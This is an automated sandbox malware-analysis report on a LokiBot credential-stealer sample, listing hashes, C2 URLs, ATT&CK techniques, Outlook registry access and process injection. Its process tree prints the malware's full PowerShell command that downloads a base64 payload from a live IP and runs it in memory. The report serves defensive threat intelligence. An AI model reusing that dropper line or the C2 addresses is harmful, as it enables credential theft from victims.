lokibot | 8b54fd4b6fd11853474de7367c7bde98e5472d20c8a04dbd2727f3884734f8ef

General

Target

DH0238999742.vbs
Size

437KB
MD5

a28574570548d916d36ddfa0ab962548
SHA1

6b0da48289ca73aa1732d211544665ca5dcf6a25
SHA256

8b54fd4b6fd11853474de7367c7bde98e5472d20c8a04dbd2727f3884734f8ef
SHA512

a26bb1cb28ea4c68f9f7a7d96094b41c5dc56ce67ea4abe1ce26857c005c4e0f35a72494e458e4cf4a2aae53910e4b89d20bcf4f09116deef26fa64144930488
SSDEEP

48:kklC0eHz7/m7rJv4PsfbuUbNbbldQbWUSS/Pe20NrFR4PLEvvldI:nl+/mrOeqUZldQbAMPKNrY4vvldI

Score

10^/10

lokibot collection spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Extracted

Family

lokibot

C2

http://iklok.us/li/UN/cocacola.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 5048 powershell.exe
10 5048 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe
Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe

flow	pid	process
5	5048	powershell.exe
10	5048	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

cvtres.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	cvtres.exe
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	cvtres.exe
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	cvtres.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 5048 set thread context of 1740 5048 powershell.exe cvtres.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

5048 powershell.exe
5048 powershell.exe
1516 powershell.exe
1516 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.execvtres.exe

description pid process

Token: SeDebugPrivilege 5048 powershell.exe
Token: SeDebugPrivilege 1516 powershell.exe
Token: SeDebugPrivilege 1740 cvtres.exe

description	pid	process	target process
PID 5048 set thread context of 1740	5048	powershell.exe	cvtres.exe

pid	process
5048	powershell.exe
5048	powershell.exe
1516	powershell.exe
1516	powershell.exe

description	pid	process
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	1740	cvtres.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 5008 wrote to memory of 5048	5008	WScript.exe	powershell.exe
PID 5008 wrote to memory of 5048	5008	WScript.exe	powershell.exe
PID 5048 wrote to memory of 1516	5048	powershell.exe	powershell.exe
PID 5048 wrote to memory of 1516	5048	powershell.exe	powershell.exe
PID 5048 wrote to memory of 1740	5048	powershell.exe	cvtres.exe
PID 5048 wrote to memory of 1740	5048	powershell.exe	cvtres.exe
PID 5048 wrote to memory of 1740	5048	powershell.exe	cvtres.exe
PID 5048 wrote to memory of 1740	5048	powershell.exe	cvtres.exe
PID 5048 wrote to memory of 1740	5048	powershell.exe	cvtres.exe
PID 5048 wrote to memory of 1740	5048	powershell.exe	cvtres.exe
PID 5048 wrote to memory of 1740	5048	powershell.exe	cvtres.exe
PID 5048 wrote to memory of 1740	5048	powershell.exe	cvtres.exe
PID 5048 wrote to memory of 1740	5048	powershell.exe	cvtres.exe

outlook_office_path 1 IoCs

Processes:

cvtres.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	cvtres.exe

outlook_win_path 1 IoCs

Processes:

cvtres.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	cvtres.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DH0238999742.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.efil/tt/681.17.612.581//:ptth'))
2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5048

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
3⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1740

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
memory/1516-135-0x0000000000000000-mapping.dmp

Download
memory/1516-140-0x00007FFFC9CB0000-0x00007FFFCA771000-memory.dmp

Filesize
10.8MB

Download
memory/1516-144-0x00007FFFC9CB0000-0x00007FFFCA771000-memory.dmp

Filesize
10.8MB

Download
memory/1740-136-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1740-137-0x00000000004139DE-mapping.dmp

Download
memory/1740-139-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1740-145-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1740-146-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/5048-132-0x0000000000000000-mapping.dmp

Download
memory/5048-141-0x00007FFFC9CB0000-0x00007FFFCA771000-memory.dmp

Filesize
10.8MB

Download
memory/5048-134-0x00007FFFC9CB0000-0x00007FFFCA771000-memory.dmp

Filesize
10.8MB

Download
memory/5048-133-0x00000248A5660000-0x00000248A5682000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads